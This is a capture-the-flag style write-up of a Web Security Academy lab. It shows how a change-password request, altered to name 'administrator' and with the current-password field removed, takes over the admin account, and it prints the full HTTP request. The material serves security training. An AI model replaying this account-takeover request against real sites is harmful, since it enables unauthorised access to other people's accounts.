Weak isolation on dual-use endpoint

This lab makes a flawed assumption about the user's privilege level based on their input. As a result, you can exploit the logic of its account management features to gain access to arbitrary users' accounts. To solve the lab, access the administrator account and delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

I can immediately identify the change password functionality. When attempting to modify a user's password, the parameters involved are as follows:

username=wiener

current-password=peter

new-password-1=password

new-password-2=password

The objective is to log in as the administrator user. Therefore, by intercepting the change-password POST request, I can alter the username to "administrator," omit the current-password parameter along with its value, and input a new password. The modified request will look like this:

POST /my-account/change-password HTTP/2
Host: **********************************.web-security-academy.net
Cookie: session=**********************************
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Origin: https://**********************************.web-security-academy.net
Referer: https://**********************************.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

csrf=qWH87x97mvQFQWqm3k41aUnV2pZjAod2&username=administrator&new-password-1=password&new-password-2=password

Password changed successfully!

Now, all that remains is to log in as the administrator using the updated password and proceed to delete the user "carlos" to successfully resolve the lab.